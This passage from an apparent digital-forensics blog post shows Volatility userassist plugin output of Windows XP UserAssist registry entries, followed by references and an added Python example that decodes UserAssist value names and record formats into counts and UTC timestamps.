Last updated: 2010-09-20 15:02:47

0000 1E 00 00 00 0B 00 00 00 E0 85 39 E3 D4 58 CB 01 ..........9..X..

REG_BINARY UEME_RUNPIDL :
ID: 31
Count: 124
Last updated: 2010-11-24 14:19:29

0000 1F 00 00 00 81 00 00 00 50 78 79 9B E2 8B CB 01 ........Pxy.....

REG_BINARY UEME_RUNPIDL:%csidl2%\Microsoft Visual Basic 6.0 :
ID: 1
Count: 2
Last updated: 2009-05-12 02:28:10

0000 01 00 00 00 02 00 00 00 B0 1E DB 4A A9 D2 C9 01 ...........J....

REG_BINARY UEME_RUNPATH:C:\Program Files\Microsoft Visual Studio\VB98\VB6.EXE :
ID: 1
Count: 1
Last updated: 2009-05-12 02:28:10

0000 01 00 00 00 06 00 00 00 50 62 FC 4A A9 D2 C9 01 ........Pb.J....

REG_BINARY UEME_RUNPIDL:C:\Documents and Settings\All Users\Start Menu\Windows Update.lnk :
ID: 1
Count: 1
Last updated: 2009-05-12 02:28:36

0000 01 00 00 00 06 00 00 00 F0 D0 A1 5A A9 D2 C9 01 ...........Z....

REG_BINARY UEME_RUNPATH:C:\WINDOWS\system32\wupdmgr.exe :
ID: 31
Count: 2
Last updated: 2010-11-24 14:50:05
</p></pre>
<br /><br />Shoutz to ikelos for helping me optimize this :-)<br /><br />References:<br /><br />Into the Boxes issue 0x0 <a href="http://intotheboxes.wordpress.com/2010/01/01/into-the-boxes-issue-0x0/">http://intotheboxes.wordpress.com/2010/01/01/into-the-boxes-issue-0x0/</a><br /><br />RegRipper <a href="http://regripper.wordpress.com/">http://regripper.wordpress.com/</a><br /><br />Jamie Levy
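<p>As an added example that is not the Volatility userassist plugin's own code, the following Python decodes a UserAssist value the way the output above presents it: the ROT13-encoded value name, the 72-byte Windows 7 record (run count, focus count, focus time in milliseconds, FILETIME at offset 60) and the 16-byte XP record (session ID, count, FILETIME). The two sample records are taken from the hex dumps above (Microsoft.Windows.GettingStarted and UEME_RUNPATH:D:\SETUP.EXE). The ROT13 encoding of the names and the XP counter starting at 5 are assumptions taken from published UserAssist research, which the listing above bears out (raw 0x0B is reported as Count: 6); the dict field names are this example's own, and Time Focused is reported here as the raw millisecond field.</p>

```python
import codecs
import struct
from datetime import datetime, timedelta

EPOCH_1601 = datetime(1601, 1, 1)


def filetime_to_str(ft):
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to text; 0 means never updated."""
    if ft == 0:
        return None
    return (EPOCH_1601 + timedelta(microseconds=ft // 10)).strftime("%Y-%m-%d %H:%M:%S")


def decode_name(raw_name):
    """UserAssist value names are stored ROT13-encoded (assumption noted in the lead-in)."""
    return codecs.decode(raw_name, "rot_13")


def parse_userassist(raw_name, data):
    """Decode one UserAssist value into a dict; 'format' says which layout matched.
    Windows 7 records are 72 bytes, XP/2003 records are 16 bytes; anything else is kept raw."""
    entry = {"name": decode_name(raw_name), "raw_len": len(data)}
    if len(data) == 72:
        # Offsets 0x00 session, 0x04 run count, 0x08 focus count, 0x0C focus time (ms);
        # 0x10-0x37 ten 4-byte values (0xBF800000 = -1.0 in the dumps); 0x3C FILETIME.
        _session, count, focus_count, focus_ms = struct.unpack_from("<IIII", data, 0)
        (ft,) = struct.unpack_from("<Q", data, 60)
        entry.update(format="win7", count=count, focus_count=focus_count,
                     focus_ms=focus_ms, time_focused=str(timedelta(milliseconds=focus_ms)),
                     last_updated=filetime_to_str(ft))
    elif len(data) == 16:
        session_id, count, ft = struct.unpack("<IIQ", data)
        # XP's counter starts at 5 for a first use (assumption; raw 0x0B shows as Count: 6 above).
        if count > 5:
            count -= 5
        entry.update(format="xp", session_id=session_id, count=count,
                     last_updated=filetime_to_str(ft))
    else:
        entry.update(format="unknown", data=data.hex())
    return entry


# Constructed inputs: the value names are the ROT13 form as stored in the registry, and the
# bytes are copied from the hex dumps above.
SAMPLES = {
    # Windows 7: "Microsoft.Windows.GettingStarted"
    "Zvpebfbsg.Jvaqbjf.TrggvatFgnegrq": bytes.fromhex(
        "000000000E00000015000000A0680600" + "000080BF" * 10
        + "FFFFFFFF" + "ECFE7B9CC1BFCA01" + "00000000"),
    # Windows XP: "UEME_RUNPATH:D:\SETUP.EXE"
    "HRZR_EHACNGU:Q:\\FRGHC.RKR": bytes.fromhex("1E0000000B000000E08539E3D458CB01"),
    # Windows XP session value, 8 bytes, reported raw
    "HRZR_PGYFRFFVBA": bytes.fromhex("91525B0E1F000000"),
}


def parse_all(samples):
    """Decode every (raw_name, data) pair and return the entries in input order."""
    return [parse_userassist(name, data) for name, data in samples.items()]


if __name__ == "__main__":
    for e in parse_all(SAMPLES):
        print(e)
```

<p>The timestamp comes out in UTC, as in the plugin output above, because a FILETIME is defined against UTC; convert to local time only when the case requires it, and record which zone was used.</p>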